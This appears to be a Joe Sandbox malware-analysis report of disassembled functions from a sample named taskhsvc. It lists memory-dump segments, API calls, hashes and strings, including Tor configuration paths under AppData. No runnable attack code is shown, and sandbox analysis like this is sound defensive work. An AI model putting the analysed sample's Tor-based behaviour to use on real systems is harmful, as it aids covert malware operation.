Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$send
String ID: G'
API String ID: 4093867158-1542159958
Opcode ID: a9d434e2a1a3e6288667b71b3fa136c59d6886eb283ee44c07ba2f9b17cd1c32
Instruction ID: 7d116575742c9f2d250a135569caa9882aecf2b5a39c16072f20f5a5eccd88a1
Opcode Fuzzy Hash: a9d434e2a1a3e6288667b71b3fa136c59d6886eb283ee44c07ba2f9b17cd1c32
Instruction Fuzzy Hash: E241F1B490434ACFCB00DFA9C5846AEBBF0FF48314F148919E4A9AB352D774A944DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00E833E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00E840CE: abort.MSVCRT ref: 00E8412D
Part of subcall function 00E840CE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00E3B8C3), ref: 00E8416C

abort.MSVCRT ref: 00E8348F
__stack_chk_fail.LIBSSP-0 ref: 00E83545

Strings

authority, xrefs: 00E8349A
mirror, xrefs: 00E834A1

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID: authority$mirror
API String ID: 3276312271-4157050620
Opcode ID: 57890a9e7941c6ffdd1e83d23d3bba2af29bce0bfa52bfbf7c18bdfe44fa0bea
Instruction ID: f7f47d3e6ed986b8c4a11cb0fbdfd8647f4a81405fe153e44bd28769b8ebf3c4
Opcode Fuzzy Hash: 57890a9e7941c6ffdd1e83d23d3bba2af29bce0bfa52bfbf7c18bdfe44fa0bea
Instruction Fuzzy Hash: B94162B490431A9FCB40EFA8C585AAEBBF0BF48714F519869E898E7301D739D944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00DBBBA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DBBBD2
memset.MSVCRT ref: 00DBBBF0

Part of subcall function 00EE70E4: __stack_chk_fail.LIBSSP-0 ref: 00EE713A

Part of subcall function 00EE910D: __stack_chk_fail.LIBSSP-0 ref: 00EE9194

__stack_chk_fail.LIBSSP-0 ref: 00DBC40D

Part of subcall function 00EE919B: strerror.MSVCRT ref: 00EE91ED
Part of subcall function 00EE919B: __stack_chk_fail.LIBSSP-0 ref: 00EE91FD

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA87B
Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA8BD
Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA8FC
Part of subcall function 00DBA80C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D92F5D), ref: 00DBA983

Part of subcall function 00EE721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00EE6FE0), ref: 00EE724B

Part of subcall function 00DC4130: abort.MSVCRT ref: 00DC419F

Strings

G', xrefs: 00DBBC84

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$memsetstrerror
String ID: G'
API String ID: 3168315772-1542159958
Opcode ID: 97ec8874b2e0631f386a15651f42380e12a136cf205fc420878f310d6b765c75
Instruction ID: 341fd511e7ce5dbd78b85506ee729884452b6eab1c4738a3a7f58dc174fa2a25
Opcode Fuzzy Hash: 97ec8874b2e0631f386a15651f42380e12a136cf205fc420878f310d6b765c75
Instruction Fuzzy Hash: 8741F5B0908749DEDB20AF65C48975EBBF0FF40314F00889DE0C95B282DB788988DF22

Uniqueness

Uniqueness Score: -1.00%

Function 00EE9C41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EE9C9A
memset.MSVCRT ref: 00EE9D32
__stack_chk_fail.LIBSSP-0 ref: 00EE9D4C

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

M, xrefs: 00EE9C8A

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortmemset
String ID: M
API String ID: 4235535680-3664761504
Opcode ID: 082ce9f7ebc2c7f0c053c6b89c98b8e259924e835b861365ba65482a09c94125
Instruction ID: 61ed84928addf93bc2fd9eb48f04b338106acfa83c59bf4a7fbda24c1fdaba58
Opcode Fuzzy Hash: 082ce9f7ebc2c7f0c053c6b89c98b8e259924e835b861365ba65482a09c94125
Instruction Fuzzy Hash: DA31AFB4A0421ACFCB00EFA9C485AAEF7F0FF48310F158959E864AB361D738E945DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9AAB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DF9B28

Part of subcall function 00DF990B: __stack_chk_fail.LIBSSP-0 ref: 00DF9AA1

Part of subcall function 00EE6005: __stack_chk_fail.LIBSSP-0 ref: 00EE605E

Strings

C:\Users\user\AppData\Roaming\tor\torrc, xrefs: 00DF9B0C, 00DF9B18
z9, xrefs: 00DF9AFC
C:\Users\user\AppData\Roaming\tor\torrc-defaults, xrefs: 00DF9AE0, 00DF9AEC

Memory Dump Source

Source File: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
